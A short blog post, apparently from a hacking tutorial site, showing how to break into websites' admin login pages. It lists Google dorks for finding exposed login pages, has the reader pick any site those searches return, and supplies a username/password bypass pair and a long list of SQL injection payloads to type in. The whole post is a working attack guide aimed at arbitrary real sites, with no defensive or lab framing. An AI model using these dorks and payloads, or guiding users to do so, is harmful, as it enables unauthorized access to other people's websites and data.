Monday, October 21

Basic SQL Injection using login Queries



Hy friends in my previous tutorial i show you how to use google dorks to find vulnerable websites. In this tutorial i will show you, how to hack a vulnerable website using basic SQL injection 
                                                                Here are the following dork which is used in this tutorial.

Google Dorks:
inurl:/adminlogin.aspx
inurl:/admin/index.php
inurl:/administrator.php
inurl:/administrator.asp
inurl:/login.asp
inurl:/login.aspx
inurl:/login.php
inurl:/admin/index.php
inurl:/adminlogin.aspx




~~~~~~~~~~

POSTED BY
~~~~~~~~~~
hackerz_on_mig
Now what we have to do is just copy any dork from the above then paste in google search bar now hundreds of sites will open up having /adminlogin.aspx in their URL. Select any website, you will get the area from where the admins login. Fill the details as:

User: 1'or'1'='1
Password: 1'or'1'='1

OR

User: admin
Password:  ‘or’1’=’1

You can also used the Queries which is giving below in the place of admin & password

Other InjecTion Queries:

‘ or 1=1 –
1'or’1'=’1
admin’–
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’='x
” or “x”=”x
‘) or (‘x’='x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’='a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’='a
hi’) or (‘a’='a
hi”) or (“a”=”)

~~~~~~~~~~~~~~~
WORKING SNAP
~~~~~~~~~~~~~~~~~



































ENJOY...
DONT FORGET TO LIKE US ON FACEBOOK